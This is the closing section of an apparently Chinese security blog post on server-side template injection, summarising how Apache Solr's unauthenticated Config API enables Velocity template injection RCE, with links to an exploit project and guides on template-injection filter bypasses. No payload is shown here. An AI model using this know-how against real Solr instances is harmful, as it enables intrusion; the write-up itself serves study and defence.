<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><h2 id="漏洞总结"><a href="#漏洞总结" class="headerlink" title="漏洞总结"></a>漏洞总结</h2><p>&emsp;&emsp; Apache Solr的<code>Config API</code>是自带功能，用于通过HTTP请求更改配置；当Solr未设置访问鉴权时，可以直接通过ConfigAPI更改配置，为漏洞利用创造了前提。config api是solr多此爆出漏洞关键<a href="https://github.com/Imanfeng/Apache-Solr-RCE" target="_blank" rel="noopener">Apache Solr RCE</a>有想法的童鞋可以看看这个项目。</p>
<h2 id="题外话"><a href="#题外话" class="headerlink" title="题外话"></a>题外话</h2><p>&emsp;&emsp; 之前刚刚爆出漏洞的时候，笔者还曾复现过，但奈何能力有限，不能深入理解其中内涵。深表惭愧，总的来说，努力学习，安全一行任重而道远。</p>
<hr>
<h1 id="推荐学习资料"><a href="#推荐学习资料" class="headerlink" title="推荐学习资料"></a>推荐学习资料</h1><p>&emsp;&emsp; 想进行深入研究此漏洞肯定光看我这篇文章是不足的，毕竟我这这个只是Java方面上的，python、php等语言都没介绍。故此推荐，望彼有助。</p>
<p><strong>国内资料</strong></p>
<p>Python方面：<a href="https://www.anquanke.com/post/id/188172" target="_blank" rel="noopener">SSTI/沙盒逃逸详细总结
</a><a href="https://xz.aliyun.com/t/3679" target="_blank" rel="noopener">flask之ssti模版注入从零到入门</a><br><a href="https://p0sec.net/index.php/archives/120/" target="_blank" rel="noopener">Flask/Jinja2模板注入中的一些绕过姿势</a><br>PHP方面：<a href="https://www.freebuf.com/vuls/83999.html" target="_blank" rel="noopener">服务端模板注入攻击 （SSTI）之浅析</a></p>
<p><strong>国外资料</strong></p>
<p>这篇总结的比较全面：<a href="https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf" target="_blank" rel="noopener">Server-Side Template Injection: RCE for the modern webapp
</a><br>Python方面：<a href="https://0day.work/jinja2-template-injection-filter-bypasses/" target="_blank" rel="noopener">Jinja2 template injection filter bypasses</a></p>
<hr>
<h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><p><a href="https://www.liangzl.com/get-article-detail-138970.html" target="_blank" rel="noopener">https://www.liangzl.com/get-article-detail-138970.html</a><br><a href="https://xz.aliyun.com/t/3679" target="_blank" rel="noopener">https://xz.aliyun.com/t/3679</a><br><a href="https://cert.360.cn/report/detail?id=6125d7f75170c309de1ffdde11f86355" target="_blank" rel="noopener">https://cert.360.cn/report/detail?id=6125d7f75170c309de1ffdde11f86355</a><br><a href="https://paper.seebug.org/1107/#41" target="_blank" rel="noopener">https://paper.seebug.org/1107/#41</a><br><a href="https://ackcent.com/blog/in-depth-freemarker-template-injection/" target="_blank" rel="noopener">https://ackcent.com/blog/in-depth-freemarker-template-injection/</a><br><a href="https://www.cnblogs.com/wade-luffy/p/5996848.html" target="_blank" rel="noopener">https://www.cnblogs.com/wade-luffy/p/5996848.html</a><br><a href="https://www.w3cschool.cn/solr_doc/solr_doc-umxd2h9z.html" target="_blank" rel="noopener">https://www.w3cschool.cn/solr_doc/solr_doc-umxd2h9z.html</a><br><a href="https://blog.csdn.net/weixin_38964895/article/details/81381060" target="_blank" rel="noopener">https://blog.csdn.net/weixin_38964895/article/details/81381060</a><br><a href="https://blog.csdn.net/sweety820/article/details/74347068?depth_1-utm_source=distribute.pc_relevant.none-task&amp;utm_source=distribute.pc_relevant.none-task" target="_blank" rel="noopener">https://blog.csdn.net/sweety820/article/details/74347068?depth_1-utm_source=distribute.pc_relevant.none-task&amp;utm_source=distribute.pc_relevant.none-task</a></p>

            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls" data-autoplay="true">
                <source type="audio/mpeg" src="">
            </audio>
            
                <ul id="audio-list" style="display:none">
                    
                        
                            <li title='0' data-url='https://link.hhtjim.com/163/574566207.mp3'></li>
                        
                    
                        
                            <li title='1' data-url='https://link.hhtjim.com/qq/playsong.mp3'></li>
                        
                    
                </ul>
            
        </div>
        
    <div id='gitalk-container' class="comment link"
        data-ae='true'
        data-ci='a69212da3fc88cd39af9'
        data-cs='19e2c5d71620cb7b14d99a908f8134be70bd83fa'
        data-r='gittalksamny'
        data-o='samny520'
        data-a='samny520'
        data-d='true'
    >查看评论</div>


    </div>
    
        <div class='side'>
            <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#SSTI-服务端模板注入"><span class="toc-number">2.</span> <span class="toc-text">SSTI 服务端模板注入</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞分析"><span class="toc-number">2.1.</span> <span class="toc-text">漏洞分析</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#案例分析-—-Apache-solr-Velocity-模版注入"><span class="toc-number">3.</span> <span class="toc-text">案例分析 — Apache solr Velocity 模版注入</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞复现"><span class="toc-number">3.1.</span> <span class="toc-text">漏洞复现</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞分析环境搭建"><span class="toc-number">3.2.</span> <span class="toc-text">漏洞分析环境搭建</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞成因分析-–-代码层"><span class="toc-number">3.3.</span> <span class="toc-text">漏洞成因分析 – 代码层</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#POC第一部分"><span class="toc-number">3.3.1.</span> <span class="toc-text">POC第一部分</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#POC后部分分析"><span class="toc-number">3.3.2.</span> <span class="toc-text">POC后部分分析</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#后记"><span class="toc-number">4.</span> <span class="toc-text">后记</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#知识补充"><span class="toc-number">4.1.</span> <span class="toc-text">知识补充</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#set语法"><span class="toc-number">4.2.</span> <span class="toc-text">#set语法</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#foreach语法"><span class="toc-number">4.3.</span> <span class="toc-text">#foreach语法</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#JJTree渲染过程解析"><span class="toc-number">4.4.</span> <span class="toc-text">JJTree渲染过程解析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#关于POC构造方法补充说明"><span class="toc-number">4.5.</span> <span class="toc-text">关于POC构造方法补充说明</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#总结"><span class="toc-number">5.</span> <span class="toc-text">总结</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞总结"><span class="toc-number">5.1.</span> <span class="toc-text">漏洞总结</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#题外话"><span class="toc-number">5.2.</span> <span class="toc-text">题外话</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#推荐学习资料"><span class="toc-number">6.</span> <span class="toc-text">推荐学习资料</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#参考"><span class="toc-number">7.</span> <span class="toc-text">参考</span></a></li></ol>
        </div>
    
</div>


    </div>
</div>
<span id="busuanzi_container_page_pv">
   本文总阅读量<span id="busuanzi_value_page_pv"></span>次
</span>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>

<script src="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js"></script>


<script src="//lib.baomitu.com/jquery/1.8.3/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/diaspora.js"></script>
<script src="/js/snow.js"></script>
<script src="/js/test.js"></script>
<script src="/js/tx.js"></script>
<script src="/js/x.js"></script>
<script src="/js/xiantiao.js"></script>


<link rel="stylesheet" href="/photoswipe/photoswipe.css">
<link rel="stylesheet" href="/photoswipe/default-skin/default-skin.css">


<script src="/photoswipe/photoswipe.min.js"></script>
<script src="/photoswipe/photoswipe-ui-default.min.js"></script>


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>


<!-- 在想要使用窗口小部件的地方插入该标签 -->
<iframe width="900" height="401" src="https://cybermap.kaspersky.com/cn/widget/dynamic/dark" frameborder="0">


<script type="text/javascript" src="//rf.revolvermaps.com/0/0/6.js?i=5jbaycl6wsf&amp;m=7&amp;c=e63100&amp;cr1=ffffff&amp;f=arial&amp;l=0&amp;bv=90&amp;lx=-420&amp;ly=420&amp;hi=20&amp;he=7&amp;hc=a8ddff&amp;rs=80" async="async"></script>




<!-- Google Analytics -->
<script type="text/javascript">
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', '218065278', 'auto');
  ga('send', 'pageview');
</script>
<!-- End Google Analytics -->


</html>
